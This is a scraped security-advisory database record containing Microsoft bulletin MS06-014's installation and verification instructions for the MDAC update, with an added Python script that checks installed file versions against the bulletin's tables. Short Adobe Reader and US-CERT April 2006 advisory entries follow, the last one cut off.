You may also be able to verify the files that this security update has installed by reviewing the following registry keys.

For Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB911562\Filelist

Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB911562\Filelist

For Windows XP Professional x64 Edition:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP Version 2003\SP2\KB911562\Filelist

Note These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 911562 security update into the Windows installation source files.

Microsoft Data Access Components When Installed on Windows 2000 (all versions)

Prerequisites
For Windows 2000, this security update requires Service Pack 4 (SP4). For Small Business Server 2000, this security update requires Small Business Server 2000 Service Pack 1a (SP1a) or Small Business Server 2000 running with Windows 2000 Server Service Pack 4 (SP4).

The software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.

For more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.

Inclusion in Future Service Packs:
The update for this issue may be included in a future Update Rollup.

Installation Information

This security update supports the following setup switches.

Supported Security Update Installation Switches
Switch            Description
/help             Displays the command-line options
Setup Modes
/passive          Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet            Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart        Does not restart when installation has completed
/forcerestart     Restarts the computer after installation and forces other applications to close at shutdown without saving open files first.
/warnrestart[:x]  Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.)
Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrites OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDoes not back up files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files. These files are located at the path that is specified in the switch.\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnables extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site. 
For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.

Deployment Information

Note If you are unsure of the version of MDAC you are running, install the Component Checker.

To install the security update without any user intervention, use the following command at a command prompt for Windows 2000 Service Pack 4:

MDAC253-KB911562-x86-enu /quiet
or
MDAC271-KB911562-x86-enu /quiet
or
MDAC28-KB911562-x86-enu /quiet
or
MDAC281-KB911562-x86-enu /quiet

Note Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify that the installation was successful when they use the /quiet switch. Administrators should also review the MDAC253-KB911562-x86-XXX.log, MDAC271-KB911562-x86-XXX.log, MDAC28-KB911562-XXX.log or MDAC281-KB911562-XXX.log files for any failure messages when they use this switch.

To install the security update without forcing the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 4:

MDAC253-KB911562-x86-enu /norestart
or
MDAC271-KB911562-x86-enu /norestart
or
MDAC28-KB911562-x86-enu /norestart
or
MDAC281-KB911562-x86-enu /norestart

For more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site. For more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.

Restart Requirement

This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services.
However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart.

Removal Information

To remove this security update, use the Add or Remove Programs tool in Control Panel.

System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in one of the following folders:

%Windir%\$SQLUninstallMDAC25SP3-KB911562-x86-XXX$\Spuninst
%Windir%\$SQLUninstallMDAC27SP1-KB911562-x86-XXX$\Spuninst
%Windir%\$SQLUninstallMDAC28-KB911562-x86-XXX$\Spuninst
%Windir%\$SQLUninstallMDAC28SP1-KB911562-x86-XXX$\Spuninst

Supported Spuninst.exe Switches
Switch	Description

/help	Displays the command-line options.

Setup Modes
/passive	Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet	Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.

Restart Options
/norestart	Does not restart when installation has completed.
/forcerestart	Restarts the computer after installation and forces other applications to close at shutdown without saving open files first.
/warnrestart[:x]	Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart	Displays a dialog box prompting the local user to allow a restart.

Special Options
/forceappsclose	Forces other programs to close when the computer shuts down.
/log:path	Allows the redirection of installation log files.

File Information

The English version of this security update has the file attributes that are listed in the following tables. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.

Microsoft Data Access Components 2.5 Service Pack 3:
File Name	Version	Date	Time	Size	CPU
Sprecovr.exe	6.2.29.0	17-Feb-2006	23:05	29,408	x86
Spupdsvc.exe	6.2.29.0	17-Feb-2006	23:05	22,752	x86
Msadce.dll	2.53.6306.0	21-Feb-2006	19:57	327,680	x86
Msadco.dll	2.53.6306.0	21-Feb-2006	17:58	151,824	x86
Msadcs.dll	2.53.6306.0	21-Feb-2006	17:58	57,616	x86
Msado15.dll	2.53.6306.0	21-Feb-2006	19:57	487,424	x86
Msdaprst.dll	2.53.6306.0	21-Feb-2006	19:57	204,800	x86
Msdaps.dll	2.53.6306.0	21-Feb-2006	17:58	192,784	x86
Odbc32.dll	3.520.6306.0	21-Feb-2006	19:57	212,992	x86
Odbcbcp.dll	3.70.11.46	28-Oct-2003	21:44	24,848	x86
Odbccp32.dll	3.520.6306.0	21-Feb-2006	17:58	102,672	x86
Odbcji32.dll	4.0.6306.0	21-Feb-2006	17:58	53,520	x86
Odbcjt32.dll	4.0.6306.0	21-Feb-2006	17:58	278,800	x86
Oddbse32.dll	4.0.6306.0	21-Feb-2006	17:58	20,752	x86
Odexl32.dll	4.0.6306.0	21-Feb-2006	17:58	20,752	x86
Odfox32.dll	4.0.6306.0	21-Feb-2006	17:58	20,752	x86
Odpdx32.dll	4.0.6306.0	21-Feb-2006	17:58	20,752	x86
Odtext32.dll	4.0.6306.0	21-Feb-2006	17:58	20,752	x86
Oledb32.dll	2.53.6306.0	21-Feb-2006	19:57	483,328	x86
Sqlsrv32.dll	3.70.11.46	28-Oct-2003	21:44	524,560	x86
Datasource.xml		21-Feb-2006	19:57	24,532	
Sqlse.rll	1.1.2022.0	17-Feb-2006	23:04	45,056	
Sqlstpcustomdll.dll	1.1.2022.0	21-Feb-2006	19:57	1,843,712	x86
Sqlstpcustomdll.rll	1.1.2022.0	17-Feb-2006	23:04	12,288	

Microsoft Data Access Components 2.7 Service Pack 1:
File Name	Version	Date	Time	Size	CPU
Sprecovr.exe	6.2.29.0	18-Feb-2006	06:51	29,408	x86
Spupdsvc.exe	6.2.29.0	18-Feb-2006	06:51	22,752	x86
Dbnetlib.dll	2000.81.9053.0	25-Feb-2006	07:57	61,440	x86
Msadce.dll	2.71.9053.0	25-Feb-2006	07:57	307,200	x86
Msadcf.dll	2.71.9053.0	25-Feb-2006	07:57	57,344	x86
Msadco.dll	2.71.9053.0	25-Feb-2006	07:57	135,168	x86
Msadcs.dll	2.71.9053.0	25-Feb-2006	07:57	53,248	x86
Msadds.dll	2.71.9053.0	25-Feb-2006	07:57	147,456	x86
Msado15.dll	2.71.9053.0	25-Feb-2006	07:57	491,520	x86
Msadomd.dll	2.71.9053.0	25-Feb-2006	07:57	159,744	x86
Msadox.dll	2.71.9053.0	25-Feb-2006	07:57	180,224	x86
Msadrh15.dll	2.71.9053.0	25-Feb-2006	07:57	53,248	x86
Msdaora.dll	2.71.9053.0	25-Feb-2006	07:57	221,184	x86
Msdaprst.dll	2.71.9053.0	25-Feb-2006	07:57	180,224	x86
Msdaps.dll	2.71.9053.0	25-Feb-2006	07:57	188,416	x86
Msdarem.dll	2.71.9053.0	25-Feb-2006	07:57	110,592	x86
Msdart.dll	2.71.9053.0	25-Feb-2006	07:57	126,976	x86
Msdasql.dll	2.71.9053.0	25-Feb-2006	07:57	303,104	x86
Msdfmap.dll	2.71.9053.0	25-Feb-2006	07:57	32,768	x86
Msjro.dll	2.71.9053.0	25-Feb-2006	07:57	90,112	x86
Msorcl32.dll	2.573.9053.0	25-Feb-2006	07:57	131,072	x86
Odbc32.dll	3.520.9053.0	25-Feb-2006	07:57	204,800	x86
Odbcbcp.dll	2000.81.9053.0	25-Feb-2006	07:57	24,576	x86
Odbccp32.dll	3.520.9053.0	25-Feb-2006	07:57	98,304	x86
Odbccr32.dll	3.520.9053.0	25-Feb-2006	07:57	61,440	x86
Odbccu32.dll	3.520.9053.0	25-Feb-2006	07:57	61,440	x86
Oledb32.dll	2.71.9053.0	25-Feb-2006	07:57	417,792	x86
Sqloledb.dll	2000.81.9053.0	25-Feb-2006	07:57	471,040	x86
Sqlsrv32.dll	2000.81.9053.0	25-Feb-2006	07:57	385,024	x86
Sqlxmlx.dll	2000.81.9053.0	25-Feb-2006	07:57	200,704	x86
Datasource.xml		25-Feb-2006	07:57	26,546	
Sqlse.rll	1.1.2022.0	18-Feb-2006	06:49	45,056	
Sqlstpcustomdll.dll	1.1.2022.0	25-Feb-2006	07:57	1,843,712	x86
Sqlstpcustomdll.rll	1.1.2022.0	18-Feb-2006	06:49	12,288	

Microsoft Data Access Components 2.8:
File Name	Version	Date	Time	Size	CPU
dbnetlib.dll	2000.85.1062.0000	7-Mar-2006	14:27	73,728	x86
dbnmpntw.dll	2000.85.1062.0000	7-Mar-2006	14:27	28,672	x86
msadce.dll	2.80.1062.0000	7-Mar-2006	14:27	315,392	x86
msadco.dll	2.80.1062.0000	7-Mar-2006	14:27	135,168	x86
msadcs.dll	2.80.1062.0000	7-Mar-2006	14:27	49,152	x86
msadds.dll	2.80.1062.0000	7-Mar-2006	14:27	147,456	x86
msado15.dll	2.80.1062.0000	7-Mar-2006	14:27	507,904	x86
msadomd.dll	2.80.1062.0000	7-Mar-2006	14:27	163,840	x86
msadox.dll	2.80.1062.0000	7-Mar-2006	14:27	184,320	x86
msadrh15.dll	2.80.1062.0000	7-Mar-2006	14:27	53,248	x86
msdaora.dll	2.80.1062.0000	7-Mar-2006	14:27	225,280	x86
msdaprst.dll	2.80.1062.0000	7-Mar-2006	14:27	192,512	x86
msdart.dll	2.80.1062.0000	7-Mar-2006	14:27	147,456	x86
msdasql.dll	2.80.1062.0000	7-Mar-2006	14:27	303,104	x86
msorcl32.dll	2.575.1062.0000	7-Mar-2006	14:27	139,264	x86
odbc32.dll	3.525.1062.0000	7-Mar-2006	14:27	221,184	x86
odbcbcp.dll	2000.85.1062.0000	7-Mar-2006	14:27	24,576	x86
oledb32.dll	2.80.1062.0000	7-Mar-2006	14:27	442,368	x86
sqloledb.dll	2000.85.1062.0000	7-Mar-2006	14:27	503,808	x86
sqlsrv32.dll	2000.85.1062.0000	7-Mar-2006	14:27	401,408	x86
sqlxmlx.dll	2000.85.1062.0000	7-Mar-2006	14:27	208,896	x86
datasource.xml		7-Mar-2006	14:27	25,166	
sqlse.rll	1.01.2022.0000	17-Feb-2006	15:02	45,056	x86
sqlstpcustomdll.dll	1.01.2022.0000	7-Mar-2006	14:27	1,843,712	x86
sqlstpcustomdll.rll	1.01.2022.0000	17-Feb-2006	15:02	12,288	x86
sprecovr.exe	6.02.0029.0000	17-Feb-2006	15:04	29,408	x86
spuninst.exe	6.02.0029.0000	17-Feb-2006	15:04	213,216	x86
spupdsvc.exe	6.02.0029.0000	17-Feb-2006	15:04	22,752	x86

Microsoft Data Access Components 2.8 Service Pack 1:
File Name	Version	Date	Time	Size	CPU
Sprecovr.exe	6.2.29.0	17-Feb-2006	22:04	29,408	x86
Spupdsvc.exe	6.2.29.0	17-Feb-2006	22:04	22,752	x86
Msadco.dll	2.81.1124.0	22-Feb-2006	06:35	143,360	x86
Msado15.dll	2.81.1124.0	22-Feb-2006	06:35	524,288	x86
Msadomd.dll	2.81.1124.0	22-Feb-2006	06:35	180,224	x86
Msadox.dll	2.81.1124.0	22-Feb-2006	06:35	200,704	x86
Msdasql.dll	2.81.1124.0	22-Feb-2006	06:35	307,200	x86
Msjro.dll	2.81.1124.0	22-Feb-2006	06:35	102,400	x86
Sqloledb.dll	2000.85.1124.0	22-Feb-2006	06:35	520,192	x86
Datasource.xml		22-Feb-2006	06:35	22,450	
Sqlse.rll	1.1.2022.0	17-Feb-2006	22:02	45,056	
Sqlstpcustomdll.dll	1.1.2022.0	22-Feb-2006	06:36	1,843,712	x86
Sqlstpcustomdll.rll	1.1.2022.0	17-Feb-2006	22:02	12,288	

Verifying that the Update Has Been Applied

• Microsoft Baseline Security Analyzer

To verify that a security update has been applied to an affected system, you can use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.

• File Version Verification

Note Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.

1. Click Start, and then click Search.
2. In the Search Results pane, click All files and folders under Search Companion.
3. In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.
4. In the list of files, right-click a file name from the appropriate file information table, and then click Properties.

Note Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.

5. On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.

Note Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation.
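The file version comparison above is easy to get wrong when it is scripted across a fleet: the bulletin's tables mix "2.81.1124.0" with zero-padded forms such as "2000.85.1062.0000", and a plain string comparison ranks "2.81.1124.0" below "2.81.999.0". The following script is an added example, not code from the bulletin or from Microsoft. It copies a subset of the MDAC 2.8 and MDAC 2.8 SP1 tables above, compares only the file version (the one attribute the bulletin says is a supported check), and treats a file that is absent as inconclusive rather than as a failure, since the bulletin notes that not every listed file is installed on every system. The three "installed" inventories are constructed sample data; in practice they would come from the Properties > Version tab steps above or from a file-version tool.

```python
"""Check a host's file versions against a security bulletin's file information table.

Added example; not code from the MS06-014 bulletin. The REQUIRED tables are copied
from the bulletin text above; the host inventories at the bottom are constructed
sample data (assumption: a real inventory is gathered with a file-version tool).
"""
from typing import Dict, List, Tuple

# Subset of the bulletin's "Microsoft Data Access Components 2.8 Service Pack 1" table.
KB911562_MDAC28SP1: Dict[str, str] = {
    "Msadco.dll": "2.81.1124.0",
    "Msado15.dll": "2.81.1124.0",
    "Msadomd.dll": "2.81.1124.0",
    "Msadox.dll": "2.81.1124.0",
    "Msdasql.dll": "2.81.1124.0",
    "Msjro.dll": "2.81.1124.0",
    "Sqloledb.dll": "2000.85.1124.0",
}

# Subset of the bulletin's "Microsoft Data Access Components 2.8" table, which
# zero-pads fields ("2000.85.1062.0000") where the other tables do not.
KB911562_MDAC28: Dict[str, str] = {
    "dbnetlib.dll": "2000.85.1062.0000",
    "msadce.dll": "2.80.1062.0000",
    "sqloledb.dll": "2000.85.1062.0000",
}


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Parse a four-part Windows file version into integers.

    Integer comparison is what makes "1.01.2022.0000" equal to "1.1.2022.0"
    and "2.81.1124.0" greater than "2.81.999.0"; string comparison gets both wrong.
    """
    parts = version.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a four-part numeric file version: {version!r}")
    a, b, c, d = (int(p) for p in parts)
    return (a, b, c, d)


def check_host(installed: Dict[str, str], required: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify each file in the bulletin table as ok, outdated or missing.

    Only the file version is compared: the bulletin says size, date and other
    attributes may change during installation and are not a supported check.
    File names are compared case-insensitively (the tables mix cases).
    """
    have = {name.lower(): ver for name, ver in installed.items()}
    result: Dict[str, List[str]] = {"ok": [], "outdated": [], "missing": []}
    for name, minimum in required.items():
        current = have.get(name.lower())
        if current is None:
            result["missing"].append(name)
        elif parse_version(current) >= parse_version(minimum):
            result["ok"].append(name)
        else:
            result["outdated"].append(name)
    return result


def verdict(installed: Dict[str, str], required: Dict[str, str]) -> str:
    """Reduce a check to 'patched', 'not patched' or 'inconclusive'.

    Any file below the table version means the update is not applied. A file that
    is absent is not evidence either way (the bulletin notes some listed files may
    not be installed), so a host where nothing could be compared is 'inconclusive'
    and should be verified by the registry-key or MBSA method instead.
    """
    r = check_host(installed, required)
    if r["outdated"]:
        return "not patched"
    if r["ok"]:
        return "patched"
    return "inconclusive"


# Constructed sample inventories: file name -> version string as a version tool reports it.
PATCHED_HOST = {
    "msadco.dll": "2.81.1124.0", "msado15.dll": "2.81.1124.0", "msadomd.dll": "2.81.1124.0",
    "msadox.dll": "2.81.1124.0", "msdasql.dll": "2.81.1124.0", "msjro.dll": "2.81.1124.0",
    "sqloledb.dll": "2000.85.1124.0",
}
UNPATCHED_HOST = {**PATCHED_HOST, "msadco.dll": "2.81.1117.0"}  # one pre-update file (constructed)
PARTIAL_HOST = {"msadco.dll": "2.81.1124.0"}                      # only one listed file present
MDAC28_HOST = {"dbnetlib.dll": "2000.85.1062.0", "msadce.dll": "2.80.1062.0",
               "sqloledb.dll": "2000.85.1062.0"}                   # unpadded form of the 2.8 versions

if __name__ == "__main__":
    for label, host, table in [("patched", PATCHED_HOST, KB911562_MDAC28SP1),
                               ("unpatched", UNPATCHED_HOST, KB911562_MDAC28SP1),
                               ("partial", PARTIAL_HOST, KB911562_MDAC28SP1),
                               ("mdac28", MDAC28_HOST, KB911562_MDAC28)]:
        print(f"{label:10s} {verdict(host, table):13s} {check_host(host, table)}")
```

The verdict deliberately has three states: a fleet report that collapses "missing" into "not patched" will flag every host that does not carry the full MDAC file set, while one that collapses it into "patched" will silently pass hosts where the scan found nothing to compare. Hosts in the inconclusive bucket are the ones to follow up with the registry keys listed under Registry Key Verification.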
If the file or version information is not present, use one of the other available methods to verify update installation.

• Registry Key Verification

You may also be able to verify the files that this security update has installed by reviewing the following registry keys.

Microsoft Data Access Components 2.5 Service Pack 3:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC25\SP3\KB911562\Filelist

Microsoft Data Access Components 2.7 Service Pack 1:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC27\SP1\KB911562\Filelist

Microsoft Data Access Components 2.8:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC28\SP0\KB911562\Filelist

Microsoft Data Access Components 2.8 Service Pack 1:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\DataAccess\MDAC28\SP1\KB911562\Filelist

Note These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly when an administrator or an OEM integrates or slipstreams the 911562 security update into the Windows installation source files.

Acknowledgments

Microsoft thanks the following for working with us to help protect customers:

• Golan Yosef of Finjan's Malicious Code Research Center (MCRC) for working with Microsoft on the Microsoft Windows MDAC Vulnerability - CVE-2006-0003.
• Stefano Meller and Mirko Gatto of Yarix for working with Microsoft on the Microsoft Windows MDAC Vulnerability - CVE-2006-0003.

Obtaining Other Security Updates:

Updates for other security issues are available at the following locations:

• Security updates are available in the Microsoft Download Center.
You can find them most easily by doing a keyword search for "security_patch."
• Updates for consumer platforms are available at the Microsoft Update Web site.

Support:

• Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.
• International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.

Security Resources:

• The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.
• Microsoft Software Update Services
• Microsoft Windows Server Update Services
• Microsoft Baseline Security Analyzer (MBSA)
• Windows Update
• Microsoft Update
• Windows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.
• Office Update

Software Update Services:

By using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.

For more information about how to deploy security updates by using Software Update Services, visit the Software Update Services Web site.

Windows Server Update Services:

By using Windows Server Update Services (WSUS), administrators can quickly and reliably deploy the latest critical updates and security updates for Windows 2000 operating systems and later, Office XP and later, Exchange Server 2003, and SQL Server 2000 onto Windows 2000 and later operating systems.

For more information about how to deploy security updates using Windows Server Update Services, visit the Windows Server Update Services Web site.

Systems Management Server:

Microsoft Systems Management Server (SMS) delivers a highly configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and can perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use the Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.

Note SMS uses the Microsoft Baseline Security Analyzer, the Microsoft Office Detection Tool, and the Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.

Disclaimer:

The information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose.
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Revisions:

• V1.0 (April 11, 2006): Bulletin published.

", "edition": 1, "modified": "2006-04-11T00:00:00", "published": "2006-04-11T00:00:00", "id": "SECURITYVULNS:DOC:12167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12167", "title": "Microsoft Security Bulletin MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)", "type": "securityvulns", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0509", "CVE-2009-1855", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1856", "CVE-2009-1857", "CVE-2009-0198"], "description": "

Vulnerability is used in the wild for hidden malware installations.
Recommendations are to disable PDF display inside the browser and JavaScript in PDF documents.
Buffer overflow in JBIG2 decoding; buffer overflow in the getIcon() JavaScript function.

", "edition": 1, "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "id": "SECURITYVULNS:VULN:9687", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9687", "title": "Adobe Acrobat / Reader code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "cvelist": ["CVE-2006-1186", "CVE-2006-1245", "CVE-2006-1185", "CVE-2006-1388", "CVE-2006-0012", "CVE-2006-1188", "CVE-2006-1359", "CVE-2006-0003", "CVE-2006-1189"], "description": "

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                     National Cyber Alert System

               Technical Cyber Security Alert TA06-101A

Microsoft Windows and Internet Explorer Vulnerabilities

   Original release date: April 11, 2006
   Last revised: --
   Source: US-CERT

Systems Affected

   * Microsoft Windows
   * Microsoft Internet Explorer

   For more complete information, refer to the Microsoft Security
   Bulletin Summary for April 2006.

Overview

   Microsoft has released updates that address critical vulnerabilities
   in Microsoft Windows and Internet Explorer. Exploitation of these
   vulnerabilities could allow a remote, unauthenticated attacker to
   execute arbitrary code or cause a denial of service on a vulnerable
   system.

I. Description

   Microsoft Security Bulletin Summary for April 2006 addresses
   vulnerabilities in Microsoft Windows and Internet Explorer.
   Further information is available in the following US-CERT Vulnerability Notes:

   VU#876678 - Microsoft Internet Explorer createTextRange() vulnerability

   Microsoft Internet Explorer fails to properly handle the
   createTextRange() DHTML method, possibly allowing a remote,
   unauthenticated attacker to execute arbitrary code.
   (CVE-2006-1359)

   VU#984473 - Microsoft Internet Explorer contains overflow in
   processing script action handlers

   A vulnerability in the Microsoft Internet Explorer web browser could
   allow a remote attacker to crash the browser or possibly execute
   arbitrary code on a vulnerable system.
   (CVE-2006-1245)

   VU#434641 - Microsoft Internet Explorer may automatically execute HTA
   files

   Microsoft Internet Explorer fails to properly handle HTA files. This
   vulnerability may allow a remote attacker to execute arbitrary code.
   (CVE-2006-1388)

   VU#503124 - Microsoft Internet Explorer fails to handle specially
   crafted, malformed HTML

   Microsoft Internet Explorer fails to properly handle malformed HTML.
   This vulnerability may allow a remote attacker to execute arbitrary
   code on a vulnerable system.
   (CVE-2006-1185)

   VU#959049 - Multiple COM objects cause memory corruption in Microsoft
   Internet Explorer

   Microsoft Internet Explorer allows instantiation of COM objects not
   designed for use in the browser, which may allow a remote attacker to
   execute arbitrary code or crash IE.
   (CVE-2006-1186)

   VU#824324 - Microsoft Internet Explorer fails to properly handle HTML
   elements with a specially crafted tag

   Microsoft Internet Explorer fails to properly handle HTML element
   tags, which may allow a remote, unauthenticated attacker to execute
   arbitrary code.
   (CVE-2006-1188)

   VU#341028 - Microsoft Internet Explorer fails to properly handle
   double-byte characters in specially crafted URLs

   Microsoft Internet Explorer fails to properly handle double-byte
   characters in URLs, which may allow a remote, unauthenticated attacker
   to execute arbitrary code.
   (CVE-2006-1189)

   VU#234812 - Microsoft Windows contains a vulnerability in the
   RDS.Dataspace ActiveX control in MDAC

   Microsoft Windows fails to properly handle the RDS.Dataspace ActiveX
   control, possibly allowing a remote attacker to execute arbitrary code.
   (CVE-2006-0003)

   VU#641460 - Microsoft Windows Explorer fails to properly handle COM
   objects

   Microsoft Windows fails to properly handle COM objects. This
   vulnerability may allow a remote, unauthenticated attacker to execute
   arbitrary code on a vulnerable system.
   (CVE-2006-0012)

II. Impact

   A remote, unauthenticated attacker could execute arbitrary code with
   the privileges of the user. If the user is logged on with
   administrative privileges, the attacker could take complete control of
   an affected system. An attacker may also be able to cause a denial of
   service.

III. Solution

Apply Updates

   Microsoft has provided updates for these vulnerabilities in the
   Security Bulletins and on the Microsoft Update site.

Workarounds

   Please see the US-CERT Vulnerability Notes for workarounds. Many of
   these vulnerabilities can be mitigated by following the instructions
   listed in the Securing Your Web Browser document.

Appendix A. References

   * Microsoft Security Bulletin Summary for April 2006 -
     <http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx>

   * US-CERT Vulnerability Note VU#876678 -
     <http://www.kb.cert.org/vuls/id/876678>

   * US-CERT Vulnerability Note VU#984473 -
     <http://www.kb.cert.org/vuls/id/984473>

   * US-CERT Vulnerability Note VU#434641 -
     <http://www.kb.cert.org/vuls/id/434641>

   * US-CERT Vulnerability Note VU#503124 -
     <http://www.kb.cert.org/vuls/id/503124>

   * US-CERT Vulnerability Note VU#959049 -
     <http://www.kb.cert.org/vuls/id/959049>

   * US-CERT Vulnerability Note VU#824324 -
     <http://www.kb.cert.org/vuls/id/824324>

   * US-CERT Vulnerability Note VU#341028 -
     <http://www.kb.cert.org/vuls/id/341028>

   * US-CERT Vulnerability Note VU#234812 -
     <http://www.kb.cert.org/vuls/id/234812>

   * US-CERT Vulnerability Note VU#641460 -
     <http://www.kb.cert.org/vuls/id/641460>

   * CVE-2006-1359 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359>

   * CVE-2006-1245 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245>

   * CVE-2006-1388 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1388>

   * CVE-2006-1185 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1185>

   * CVE-2006-1186 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186>

   * CVE-2006-1188 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188>

   * CVE-2006-1189 -
     <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1189>

   * CVE-2006-0003 -
